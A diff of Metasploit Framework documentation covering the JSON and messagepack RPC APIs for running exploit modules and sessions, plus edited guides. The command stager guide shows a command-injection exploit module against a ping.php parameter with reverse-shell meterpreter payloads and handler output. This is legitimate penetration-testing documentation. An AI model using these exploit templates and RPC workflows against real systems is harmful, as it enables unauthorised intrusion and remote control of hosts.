+Listening on localhost:8081, CTRL+C to stop
+[11/25/2020 17:35:17] [d(0)] core: Already established connection to postgresql, so reusing active connection.
+[11/25/2020 17:35:17] [e(0)] core: DB.connect threw an exception - ActiveRecord::AdapterNotSpecified database configuration does not specify adapter
+[11/25/2020 17:35:17] [e(0)] core: Failed to connect to the database: database configuration does not specify adapter```
+```
+
+## Concepts
+
+The Metasploit RPC aims to follow the [jsonrpc specification](https://www.jsonrpc.org/specification). Therefore:
+
+- Each JSON RPC request should provide a unique message ID which the client and server can use to correlate requests and responses
+- Metasploit may return the following [error codes](https://github.com/rapid7/metasploit-framework/blob/87b1f3b602753e39226a475a5d737fb50200957d/lib/msf/core/rpc/json/error.rb#L3-L13).
+
+## Examples 
+
+First ensure you are running the Metasploit database, and are running the JSON service before running these examples
+
+### Querying
+
+#### Query DB status
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+        "jsonrpc": "2.0",
+        "method": "db.status",
+        "id": 1,
+        "params": []
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "driver": "postgresql",
+    "db": "msf"
+  },
+  "id": 1
+}
+```
+
+#### Query workspaces
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+        "jsonrpc": "2.0",
+        "method": "db.workspaces",
+        "id": 1,
+        "params": []
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "workspaces": [
+      {
+        "id": 1,
+        "name": "default",
+        "created_at": 1673368954,
+        "updated_at": 1673368954
+      }
+    ]
+  },
+  "id": 1
+}
+```
+
+### Modules workflow
+
+#### Search for modules
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'content-type: application/json' \
+  --data '{ "jsonrpc": "2.0", "method": "module.search", "id": 1, "params": ["psexec author:egypt arch:x64"] }'
+```
+
+Response:
+
+```json
+{
+    "jsonrpc": "2.0",
+    "result": [
+        {
+            "type": "exploit",
+            "name": "PsExec via Current User Token",
+            "fullname": "exploit/windows/local/current_user_psexec",
+            "rank": "excellent",
+            "disclosuredate": "1999-01-01"
+        }
+    ],
+    "id": 1
+}
+```
+
+#### Run module check methods
+
+Metasploit modules support running `check` methods which can be used to identify the success of an exploit module, or to run an
+auxiliary module against a target. For instance, with an Auxiliary module check request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.check",
+    "id": 1,
+    "params": [
+        "auxiliary",
+        "auxiliary/scanner/ssl/openssl_heartbleed",
+        {
+            "RHOST": "192.168.123.13"
+        }
+    ]
+}'
+```
+
+Or an Exploit module check request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'content-type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.check",
+    "id": 1,
+    "params": [
+        "exploit",
+        "exploit/windows/smb/ms17_010_eternalblue",
+        {
+          "RHOST": "192.168.123.13"
+        }
+    ]
+}'
+```
+
+The response will contain an identifier which can be used to query for updates:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "job_id": 0,
+    "uuid": "1MIqJ5lViZHSOuaWf1Zz1lpR"
+  },
+  "id": 1
+}
+```
+
+#### query all running stats
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.running_stats",
+    "id": 1,
+    "params": []
+}'
+```
+
+The response will include the following keys:
+- waiting - modules that are queued up, but have not started to run yet
+- running - currently running modules
+- results - the module has completed or failed, and the results can be retrieved and acknowledged 
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "waiting": [
+      "NkJvf4kp4JxcuFCz7rjSuHL1",
+      "wRnMQuJ8gzMTp5CaHu18bHdV"      
+    ],
+    "running": [
+      "b7hIX6G4ZtwvRVRDOXk5ylSx",
+      "gx9xTEi6KlH5LJHauyhrHTBn",
+    ],
+    "results": [
+      "1MIqJ5lViZHSOuaWf1Zz1lpR",
+      "IN5PwYXrjqKfuekQt8cyCENK",
+      "Spd1xfgsCZXQABNh7UA3uB58",
+      "nRQw0bEvhFcXF0AxtVYOpQku"
+    ]
+  },
+  "id": 1
+}
+```
+
+#### retrieve module results
+
+It is possible to poll for module results using the id returned when running a module.
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.results",
+    "id": 1,
+    "params": ["0L37lfcIQqyRK9aBTIVJB4H3"]
+}'
+```
+
+Example response when the module is has not yet complete:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "status": "running"  
+  },
+  "id": 1
+}
+```
+
+Example error response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "status": "errored",
+    "error": "The connection with (192.168.123.13:443) timed out."
+  },
+  "id": 1
+}
+```
+
+Example success response:
+
+```json
+{
+    "jsonrpc": "2.0",
+    "result": {
+        "status": "completed",
+        "result": {
+            "code": "vulnerable",
+            "message": "The target is vulnerable.",
+            "reason": null,
+            "details": {
+                "os": "Windows 7 Enterprise 7601 Service Pack 1",
+                "arch": "x64"
+            }
+        }
+    },
+    "id": 1
+}
+```
+
+#### acknowledge module results
+
+This command will also allow Metasploit to remove the result resources from memory. Not acknowledging module results will lead to a memory leak,
+but the memory is limited to 35mb as the memory datastore used is implemented by [`ActiveSupport::Cache::MemoryStore`](https://github.com/rapid7/metasploit-framework/pull/13036/files#diff-6e31832215e40b17a184a7f7b82d2aabfbaa8d98fabb3c43033dd8579ad3caaeR102) 
+
+Request:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "module.ack",
+    "id": 1,
+    "params": ["nRQw0bEvhFcXF0AxtVYOpQku"]
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "success": true
+  },
+  "id": 1
+}
+```
+
+### Analyzing hosts workflow
+
+Metasploit supports an `analyze` command which suggests modules to run based on what a user has already learned and stored about a host.
+First report a host:
+
+```bash
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.report_host",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1",
+            "state": "alive",
+            "os_name": "Windows",
+            "os_flavor": "Enterprize",
+            "os_sp": "SP2",
+            "os_lang": "English",
+            "arch": "ARCH_X86",
+            "mac": "97-42-51-F2-A7-A7",
+            "scope": "eth2",
+            "virtual_host": "VMWare"
+        }    
+    ]
+}'
+
+# response: {"jsonrpc":"2.0","result":{"result":"success"},"id":1}
+```
+
+Report the host vulnerabilities:
+
+```bash
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.report_vuln",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1",
+            "name": "Exploit Name",
+            "info": "Human readable description of the vuln",
+            "refs": [
+                "CVE-2017-0143",
+                "CVE-2017-0144",
+                "CVE-2017-0145",
+                "CVE-2017-0146",
+                "CVE-2017-0147",
+                "CVE-2017-0148"
+            ]
+        }
+    ]
+}'
+
+# response: {"jsonrpc":"2.0","result":{"result":"success"},"id":1}
+```
+
+Run the analyze command:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.analyze_host",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1"
+        }
+    ]
+}'
+```
+
+Response:
+
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "host": {
+      "address": "10.0.0.1",
+      "modules": [
+        {
+          "mtype": "exploit",
+          "mname": "exploit/windows/smb/ms17_010_eternalblue",
+          "state": "READY_FOR_TEST",
+          "description": "ready for testing",
+          "options": {
+            "invalid": [],
+            "missing": []
+          }
+        }
+      ]
+    }
+  },
+  "id": 1
+}
+```
+
+When analyzing a host, it is also possible to specify payload requirements for additional granularity:
+
+```
+curl --request POST \
+  --url http://localhost:8081/api/v1/json-rpc \
+  --header 'Authorization: Bearer ' \
+  --header 'Content-Type: application/json' \
+  --data '{
+    "jsonrpc": "2.0",
+    "method": "db.analyze_host",
+    "id": 1,
+    "params": [
+        {
+            "workspace": "default",
+            "host": "10.0.0.1",
+            "payload": "payload/cmd/unix/reverse_bash"
+        }
+    ]
+}'
+```
@@ -0,0 +1,201 @@
+The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports.
+
+The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API.
+
+There are currently two implementations of Metasploit's RPC:
+
+- HTTP and messagepack - covered by this guide
+- HTTP and JSON - covered by a separate guide
+
+Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents.
+
+## Starting the messagepack RPC Server
+
+Before you can use the RPC interface, you must start the RPC server. There are a couple of ways that you can start the server depending on the Metasploit product you are using. For this example we will use the MSFRPD Login Utility, but other methods can be found [here](https://docs.rapid7.com/metasploit/rpc-api).
+
+Use the follow command setting a username and password, current example uses `user` and `pass` retrospectively:
+
+```
+$ ruby msfrpcd -U <username> -P <pass> -f
+```
+
+## Connecting with the MSFRPC Login Utility
+
+The msfrpc login utility enables you to connect to the RPC server through msfrpcd. If you started the server using the msfrpcd tool, `cd`  into your framework directory, if you're a Framework user, or the `metasploit/apps/pro/msf3` directory if you are a Pro user, and run the following command to connect to the server:
+
+```
+$ ruby msfrpc -U <username> -P <pass> -a <ip address>
+```
+You can provide the following options:
+
+- `-P <opt>` - The password to access msfrpcd.
+- `-S` - Enables or disables SSL on the RPC socket. Set this value to true or false. SSL is on by default.
+- `-U <opt>` - The username to access msfrpcd.
+- `-a <opt>` - The address msfrpcd runs on.
+- `-p <opt>` - The port the msfrpc listens on. The default port is 55553.
+
+For example, if you want to connect to the local server, you can enter the following command:
+```
+$ ruby msfrpc -U user -P pass123 -a 127.0.0.1
+```
+
+Which returns the following response:
+
+```
+[*] exec: ruby msfrpc -U user -P pass123 -a 127.0.0.1
+
+[*] The 'rpc' object holds the RPC client interface
+[*] Use rpc.call('group.command') to make RPC calls
+```
+
+## RPC Workflow examples
+
+### Start the server
+
+Use the following command to run the server with a configured uesrname and password:
+
+```
+$ ruby msfrpcd -U user -P pass -f
+```
+
+### Start the client in second terminal tab
+
+Use the username and password set in the previous command to access the client:
+
+```
+# Start the client in second terminal tab
+$ ruby msfrpc -U user -P pass -a 0.0.0.0
+```
+
+An interactive prompt will open:
+
+```
+[*] The 'rpc' object holds the RPC client interface
+[*] Use rpc.call('group.command') to make RPC calls
+```
+
+### Commands
+
+Before looking at commands, we will list the options that can be pass into RPC calls:
+```
+--rpc-host HOST
+--rpc-port PORT
+--rpc-ssl <true|false>
+--rpc-uri URI
+--rpc-user USERNAME
+--rpc-pass PASSWORD
+--rpc-token TOKEN
+--rpc-config CONFIG-FILE
+--rpc-help
+```
+
+#### Auxiliary module example
+
+To execute the `scanner/smb/smb_enumshares` module:
+
+```
+>> rpc.call("module.execute", "auxiliary", "scanner/smb/smb_enumshares", {"RHOSTS" => "192.168.175.135", "SMBUSER" => "Administrator", "SMBPASS" => "Password1"})
+=> {"job_id"=>0, "uuid"=>"yJWES2Y6d4MRyfFLWjqhqvon"}
+```
+
+Note that the result returns the `job_id` and `uuid` - which can be used for tracking the module's progress.
+
+The arguments supplied are:
+
+- `"module.execute"` - The method you want to call against the module
+- `"auxiliary"` - the module type
+- `"scanner/smb/smb_enumshares"` - The specific module you want to run
+- `{"RHOSTS" => "192.168.175.135", "SMBUSER" => "Administrator", "SMBPASS" => "Password1"}` - The module's datastore options
+
+Query all running stats with:
+
+```
+>> rpc.call('module.running_stats')
+=> {"waiting"=>[], "running"=>[], "results"=>["yJWES2Y6d4MRyfFLWjqhqvon"]}
+```
+
+Note that the output contains the previous `uuid`, which has now been marked as completed.
+To view the module results for a given `UUID`:
+
+```
+>> rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon')
+=> {"status"=>"completed", "result"=>nil}
+```
+
+#### Listing current jobs/sessions
+
+To list the current jobs:
+
+```
+>> rpc.call('job.list')
+=> {"0"=>"Exploit: windows/smb/ms17_010_psexec"}
+```
+
+To list the current sessions:
+
+```
+>> rpc.call('session.list')
+=>
+{1=>
+  {"type"=>"meterpreter",
+   "tunnel_local"=>"192.168.8.125:4444",
+   "tunnel_peer"=>"192.168.8.125:63504",
+   "via_exploit"=>"exploit/windows/smb/psexec",
+   "via_payload"=>"payload/windows/meterpreter/reverse_tcp",
+   "desc"=>"Meterpreter",
+   "info"=>"NT AUTHORITY\\SYSTEM @ DC1",
+   "workspace"=>"false",
+   "session_host"=>"192.168.175.135",
+   "session_port"=>445,
+   "target_host"=>"192.168.175.135",
+   "username"=>"cgranleese",
+   "uuid"=>"hqtjjwgx",
+   "exploit_uuid"=>"hldyog8j",
+   "routes"=>"",
+   "arch"=>"x86",
+   "platform"=>"windows"}}
+```
+
+#### Killing sessions
+
+To stop an active session use the `session.stop` command and pass the session ID. To find the session ID you can use the `session.list` command. 
+
+```
+rpc.call('session.stop', 1)
+```
+
+### Example workflows
+
+Let's look at a some workflows using the commands we discussed above for a complete workflow.
+
+#### Auxiliary module workflow
+
+```
+[*] The 'rpc' object holds the RPC client interface 
+[*] Use rpc.call('group.command') to make RPC calls
+
+>> rpc.call("module.execute", "auxiliary", "scanner/smb/smb_enumshares", {"RHOSTS" => "xxx.xxx.xxx.xxx", "SMBUSER" => "user", "SMBPASS" => "password"})
+=> {"job_id"=>0, "uuid"=>"yJWES2Y6d4MRyfFLWjqhqvon"}
+>> rpc.call('module.running_stats')
+=> {"waiting"=>[], "running"=>[], "results"=>["yJWES2Y6d4MRyfFLWjqhqvon"]}
+>> rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon')
+=> {"status"=>"completed", "result"=>nil}
+```
+
+#### Exploit module workflow
+
+This workflow makes use of the `module.check` method to check if the target is vulnerable to the module's exploit:
+
+```
+[*] The 'rpc' object holds the RPC client interface 
+[*] Use rpc.call('group.command') to make RPC calls 
+
+>> rpc.call("module.check", "exploit", "windows/smb/ms17_010_psexec", {"RHOSTS" => xxx.xxx.xxx.xxx", "SMBUSER" => "user", "SMBPASS" => "password"}) 
+=> {"job_id"=>0, "uuid"=>"q3eewYtM3LqxuVN5ai1Wya3i"} 
+>> rpc.call('module.running_stats') 
+=> {"waiting"=>[], "running"=>[], "results"=>["q3eewYtM3LqxuVN5ai1Wya3i"]} 
+>> rpc.call('module.results', 'q3eewYtM3LqxuVN5ai1Wya3i') 
+=> {"status"=>"completed", "result"=>{"code"=>"vulnerable", "message"=>"The target is vulnerable.", "reason"=>nil, "details"=>{"os"=>"Windows 8.1 9600", "arch"=>"x64"}}}
+```
+
+The `module.result` calls shows that the target is vulnerable, and additional metadata about the target has been returned.
@@ -1,5 +1,5 @@
 # How to use Msf::Auxiliary::AuthBrute to write a bruteforcer
-The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners) instead. However, some of the datastore options are still needed, so let's go over them right quick.
+The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]] instead. However, some of the datastore options are still needed, so let's go over them right quick.

 ### Regular options

@@ -53,6 +53,6 @@ Check out the other advanced options in the API documentation below.

 ### References

- <https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Powershell.html>
+- <https://docs.metasploit.com/api/Msf/Exploit/Powershell.html>
 - <https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/powershell.rb>
 - <https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/powershell/powerdump.ps1>
@@ -6,7 +6,7 @@ In this documentation, understand that we require you no exploit development kno

 Each Metasploit module comes with some metadata that explains what it's about, and to see that you must load it first. An example:

-```
+```msf
 msf > use exploit/windows/smb/ms08_067_netapi
 ```

@@ -20,11 +20,11 @@ This may sound surprising, but sometimes we get asked questions that are already

 * **Which ones have been tested**: When a module is developed, usually the exploit isn't tested against every single setup if there are too many. Usually the developers will just try to test whatever they can get their hands on. So if your target isn't mentioned here, keep in mind there is no guarantee it's going to work 100%. The safest thing to do is to actually recreate the environment your target has, and test the exploit before hitting the real thing.

-* **What conditions the server must meet in order to be exploitable**: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit's [check command](How-to-write-a-check-method.md), because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn't always there, so you should try to find this information before running that "exploit" command. Sometimes it's just common sense, really. For example: a web application's file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn't meet the requirement(s), there is no point to try.
+* **What conditions the server must meet in order to be exploitable**: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit's [[check command|How-to-write-a-check-method.md]], because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn't always there, so you should try to find this information before running that "exploit" command. Sometimes it's just common sense, really. For example: a web application's file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn't meet the requirement(s), there is no point to try.

 You can use the info command to see the module's description:

-```
+```msf
 msf exploit(ms08_067_netapi) > info
 ```

@@ -36,13 +36,13 @@ If the exploit supports automatic targeting, it is always the first item on the

 The "show options" command will tell you which target is selected. For example:

-```
+```msf
 msf exploit(ms08_067_netapi) > show options
 ```

 The "show targets" command will give you a list of targets supported:

-```
+```msf
 msf exploit(ms08_067_netapi) > show targets
 ```

@@ -50,13 +50,13 @@ msf exploit(ms08_067_netapi) > show targets

 All Metasploit modules come with most datastore options pre-configured. However, they may not be suitable for the particular setup you're testing. To do a quick double-check, usually the "show options" command is enough:

-```
+```msf
 msf exploit(ms08_067_netapi) > show options
 ```

 However, "show options" only shows you all the basic options. It does not show you the evasive or advanced options (try "show evasion" and "show advanced"), the command you should use that shows you all the datastore options is actually the "set" command:

-```
+```msf
 msf exploit(ms08_067_netapi) > set
 ```

@@ -1,4 +1,6 @@
-Command stagers provide an easy way to write exploits against typical vulnerabilities such as [command execution](https://www.owasp.org/index.php/Command_Injection) or [code injection](https://www.owasp.org/index.php/Code_Injection). There are currently 14 different flavors of command stagers, each uses system command (or commands) to save your payload, sometimes decode, and execute.
+If you’ve found a way to execute a command on a target, and you’d like the leverage that ability to execute a command into a meterpreter session, command stagers are for you.  Command stagers provide an easy way to write exploits that leverage vulnerabilities such as [command execution](https://www.owasp.org/index.php/Command_Injection) or [code injection](https://www.owasp.org/index.php/Code_Injection) and turn them into sessions. There are currently 14 different flavors of command stagers, each uses system command (or commands) to save (or not save) your payload, sometimes decode, and execute.
+
+The hardest part about command stagers is understanding how much they do.  All you need to do for a command stager is to define how the command injection works in the `execute_command` method and then select a few options.

 # The Vulnerability Test Case

@@ -85,7 +87,7 @@ An example of setting flavors for a specific target:
  ]
 ```

-Or, you can pass this info to the `execute_cmdstager` method (see Call #execute_cmdstager to begin).
+Or, you can pass this info to the `execute_cmdstager` method (see Step 4 to begin).

 ```ruby
 execute_cmdstager(flavor: :vbs)
@@ -96,11 +98,62 @@ However, it is best to set the compatible list of flavors in `CmdStagerFlavor`,

 **3. Create the execute_command method**

-You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is what gets called by the CmdStager mixin when it kicks in. Your objective in this method is to inject whatever is in the ```cmd``` variable to the vulnerable code.
+You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is how you define how to execute a command on the target.  The parameter `cmd` is the command to execute.  When writing the ```execute_cmd``` method, remember that

-**4. Call #execute_cmdstager to begin**
+**4. Decide on the supported payloads**

-And lastly, in your exploit method, call ```execute_cmdstager``` to begin the command stager.
+CmdStagers are intended to support payloads that are uploaded, saved to disk, and launched, but many of the payloads in Metasploit Framework do not need to be saved to disk; these payloads are `ARCH_CMD` payloads that rely on software already present on the target system like netcat, bash, python, or ssh.  Depending on whether the payload needs to be saved to disk or not changes what payloads are supported and how we launch the payload, so we must provide the user the ability to pick between the two.
+The best way to let the user decide what kind of payload to use is by defining separate [[targets|Get-Started-Writing-an-Exploit.md]]
+
+Here is an example targets section from a command injection module:
+
+```
+    'Targets' => [
+      [
+        'Unix Command',
+        {
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_cmd,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',
+            'RPORT' => 9000
+          }
+        }
+      ],
+      [
+        'Linux (Dropper)',
+        {
+          'Platform' => 'linux',
+          'Arch' => [ARCH_X64],
+          'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+          'Type' => :linux_dropper
+        }
+      ],
+
+```
+
+The first target is the `ARCH_CMD` target and `unix` platform.  This allows the user to select any payload that starts with `cmd/unix`.  These payloads do not need to be saved to disk and can just be launched at the command line.  The second is `ARCH_X64` and the platform is `linux`; this lets us choose any payload that starts with `linux/x64`.  These targets must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a ‘dropper’ because the file must be ‘dropped’ to the disk before it can be executed.  In each of the targets above, we’ve selected a default payload we know will work.
+
+**4. Executing a payload**
+As we said earlier, the way a payload is executed depends on the payload type.  By including `Msf::Exploit::CmdStager` you are given access to a method called ```execute_cmdstager```.  ```execute_cmdstager``` makes a list of required commands to upload, save, and execute your payload, then uses the ```execute_command``` method you defined earlier to run them on the target.
+Unfortunately, we just mentioned not all payloads need to be saved to disk.  In the case of a payload that does not need to be saved to disk, we only need to call ```execute_command```.
+This problem of payload/method juggling sounds far worse than it is.  Below is a quick example of how simple the ```exploit``` method will become if you have properly defined your targets as discussed in step 3:
+
+```ruby
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+```
+
+That’s it.  If the user selects an `ARCH_CMD` payload, we call the ```execute_command``` method on the _already_ _encoded_ payload.  You don’t need to worry about encoding the payload in your ```execute_command``` method.
+If the user has selected a binary payload like `ARCH_X64` or `ARCH_X86`, then we call ```execute_cmdstager``` which figures out how to save the file to disk and launch it based on the flavor you set earlier.

 Over the years, we have also learned that these options are quite handy when calling
 `execute_cmdstager`:
@@ -119,22 +172,26 @@ class MetasploitModule < Msf::Exploit::Remote

  include Msf::Exploit::CmdStager

-  def initialize(info={})
-    super(update_info(info,
-      'Name'            => "Command Injection Using CmdStager",
-      'Description'     => %q{
-        This exploits a command injection using the command stager.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          => [ 'sinn3r' ],
-      'References'      => [ [ 'URL', 'http://metasploit.com' ] ],
-      'Platform'        => 'linux',
-      'Targets'         => [ [ 'Linux', {} ] ],
-      'Payload'         => { 'BadChars' => "\x00" },
-      'CmdStagerFlavor' => [ 'printf' ],
-      'Privileged'      => false,
-      'DisclosureDate'  => "2016-06-10",
-      'DefaultTarget'   => 0))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Command Injection Using CmdStager',
+        'Description' => %q{
+          This exploits a command injection using the command stager.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'References' => [ [ 'URL', 'http://metasploit.com' ] ],
+        'Platform' => 'linux',
+        'Targets' => [ [ 'Linux', {} ] ],
+        'Payload' => { 'BadChars' => "\x00" },
+        'CmdStagerFlavor' => [ 'printf' ],
+        'Privileged' => false,
+        'DisclosureDate' => '2016-06-10',
+        'DefaultTarget' => 0
+      )
+    )
  end

  def execute_command(cmd, opts = {})
@@ -142,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    print_status("Exploiting...")
+    print_status('Exploiting...')
    execute_cmdstager
  end

@@ -158,7 +215,7 @@ Now let's modify the `execute_command` method and get code execution against the
 127.0.0.1+%26%26+[Malicious commands]
 ```

-We do that in `execute_command` using [HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:
+We do that in `execute_command` using [[HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]]. Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:

 ```ruby
 def filter_bad_chars(cmd)
@@ -167,19 +224,21 @@ def filter_bad_chars(cmd)
  cmd.gsub!(/ /, '+')
 end

-def execute_command(cmd, opts = {})
-  send_request_cgi({
-    'method'        => 'GET',
-    'uri'           => '/ping.php',
-    'encode_params' => false,
-    'vars_get'      => {
-      'ip' => "127.0.0.1+%26%26+#{filter_bad_chars(cmd)}"
+def execute_command(cmd, _opts = {})
+  send_request_cgi(
+    {
+      'method' => 'GET',
+      'uri' => '/ping.php',
+      'encode_params' => false,
+      'vars_get' => {
+        'ip' => "127.0.0.1+%26%26+#{filter_bad_chars(cmd)}"
+      }
    }
-  })
+  )
 end

 def exploit
-  print_status("Exploiting...")
+  print_status('Exploiting...')
  execute_cmdstager
 end
 ```
@@ -187,10 +246,10 @@ end
 And let's run that, we should have a shell:


-```
+```msf
 msf exploit(cmdstager_demo) > run

-[*] Started reverse TCP handler on 10.6.0.92:4444 
+[*] Started reverse TCP handler on 10.6.0.92:4444
 [*] Exploiting...
 [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
 [*] Sending stage (1495599 bytes) to 10.6.0.92
@@ -223,7 +282,7 @@ Available flavors:

 The [VBS command stager](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/vbs.rb) is for Windows. What this does is it encodes our payload with Base64, save it on the target machine, also writes a [VBS script](https://github.com/rapid7/rex-exploitation/blob/master/data/exploits/cmdstager/vbs_b64) using the echo command, and then lets the VBS script to decode the Base64 payload, and execute it.

-If you are exploiting Windows that supports Powershell, then you might want to [consider using that instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit) of the VBS stager, because Powershell tends to be more stealthy.
+If you are exploiting Windows that supports Powershell, then you might want to [[consider using that instead|./How-to-use-Powershell-in-an-exploit.md]] of the VBS stager, because Powershell tends to be more stealthy.

 To use the VBS stager, either specify your CmdStagerFlavor in the metadata:

@@ -21,7 +21,7 @@ option, which can be set by using the `setg` command. Module-level means only th
 remembers that datastore option, no other components will know about it. You are setting a module-level option if you
 load a module first, and then use the `set` command, like the following:

-```
+```msf
 msf > use exploit/windows/smb/ms08_067_netapi
 msf exploit(ms08_067_netapi) > set rhost 10.0.1.3
 rhost => 10.0.1.3
@@ -238,34 +238,34 @@ from the module's metadata, and update again.
 Here's an example of an exploit module's initialize portion with the DefaultOptions key:

 ```ruby
-def initialize(info={})
-  super(update_info(info,
-    'Name'           => "Module name",
-    'Description'    => %q{
-      This is an example of setting the default value of RPORT using the DefaultOptions key
-    },
-    'License'        => MSF_LICENSE,
-    'Author'         => [ 'Name' ],
-    'References'     =>
-      [
+def initialize(info = {})
+  super(
+    update_info(
+      info,
+      'Name' => 'Module name',
+      'Description' => %q{
+        This is an example of setting the default value of RPORT using the DefaultOptions key
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [ 'Name' ],
+      'References' => [
        [ 'URL', '' ]
      ],
-    'Platform'       => 'win',
-    'Targets'        =>
-      [
+      'Platform' => 'win',
+      'Targets' => [
        [ 'Windows', { 'Ret' => 0x41414141 } ]
      ],
-    'Payload'        =>
-      {
+      'Payload' => {
        'BadChars' => "\x00"
      },
-    'DefaultOptions' =>
-      {
+      'DefaultOptions' => {
        'RPORT' => 8080
      },
-    'Privileged'     => false,
-    'DisclosureDate' => "",
-    'DefaultTarget'  => 0))
+      'Privileged' => false,
+      'DisclosureDate' => '',
+      'DefaultTarget' => 0
+    )
+  )
 end
 ```

@@ -27,13 +27,14 @@ OPTIONS:
    -c        Clear the contents of the favorite modules file
    -d        Delete module(s) or the current active module from the favorite modules file
    -h        Help banner
+    -l        Print the list of favorite modules (alias for `show favorites`)
 ```



 The second method of adding favorites allows adding multiple modules at once:

-```shell
+```msf
 msf6 > favorite exploit/multi/handler exploit/windows/smb/psexec
 [+] Added exploit/multi/handler to the favorite modules file
 [+] Added exploit/windows/smb/psexec to the favorite modules file
@@ -72,7 +73,7 @@ msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec

 #### Clearing the favorites list

-```shell
+```msf
